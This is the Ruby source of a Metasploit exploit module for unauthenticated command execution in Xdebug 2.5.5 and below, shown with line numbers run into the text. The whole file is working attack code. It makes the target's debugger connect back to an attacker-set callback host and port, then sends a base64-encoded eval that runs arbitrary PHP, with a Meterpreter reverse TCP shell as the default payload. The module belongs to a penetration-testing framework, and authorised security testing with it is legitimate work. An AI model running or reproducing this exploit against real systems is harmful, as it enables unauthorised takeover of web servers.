Path: blob/master/modules/exploits/unix/http/xdebug_unauth_exec.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::HttpClient10include Rex::Proto::Http1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'xdebug Unauthenticated OS Command Execution',17'Description' => %q{18Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.19This allows the attacker to execute arbitrary php code as the context of the web user.20},21'DisclosureDate' => '2017-09-17',22'Author' => [23'Ricter Zheng', # Discovery https://twitter.com/RicterZ24'Shaksham Jaiswal', # MinatoTW25'Mumbai' # Austin Hudson26],27'References' => [28['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],29['URL', 'http://web.archive.org/web/20231226215418/https://paper.seebug.org/397/']30],31'License' => MSF_LICENSE,32'Platform' => 'php',33'Arch' => [ARCH_PHP],34'DefaultTarget' => 0,35'Stance' => Msf::Exploit::Stance::Aggressive,36'DefaultOptions' => {37'PAYLOAD' => 'php/meterpreter/reverse_tcp'38},39'Payload' => {40'DisableNops' => true,41},42'Targets' => [[ 'Automatic', {} ]],43'Notes' => {44'Reliability' => UNKNOWN_RELIABILITY,45'Stability' => UNKNOWN_STABILITY,46'SideEffects' => UNKNOWN_SIDE_EFFECTS47}48)49)5051register_options([52OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),53OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),54OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),55Opt::RPORT(80),56])57end5859def check60begin61res = send_request_cgi({62'uri' => datastore["PATH"],63'method' => 'GET',64'vars_get' => {65'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)66}67})68vprint_status "Request sent\n#{res}"69if res && res.headers.to_s =~ /XDEBUG/i70vprint_good("Looks like remote server has xdebug enabled\n")71return CheckCode::Detected72else73return CheckCode::Safe74end75rescue Rex::ConnectionError76return CheckCode::Unknown77end78end7980def exploit81payl = Rex::Text.encode_base64("#{payload.encoded}")82cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("eval(base64_decode(\"#{payl}\"));") + "\x00"83webserver = Thread.new do84begin85server = Rex::Socket::TcpServer.create(86'LocalPort' => datastore['SRVPORT'],87'LocalHost' => datastore['SRVHOST'],88'Context' => {89'Msf' => framework,90'MsfExploit' => self91}92)9394client = server.accept95print_status("Waiting for client response.")96data = client.recv(1024)97print_status("Receiving response")98vprint_line(data)99print_status("Shell might take upto a minute to respond.Please be patient.")100print_status("Sending payload of size #{cmd1.length} bytes")101client.write(cmd1)102client.close103server.close104webserver.exit105ensure106webserver.exit107end108end109send_request_cgi({110'uri' => datastore['PATH'],111'method' => 'GET',112'headers' => {113'X-Forwarded-For' => "#{lhost}",114'Cookie' => 'XDEBUG_SESSION=' + rand_text_alphanumeric(10)115}116})117end118end119120121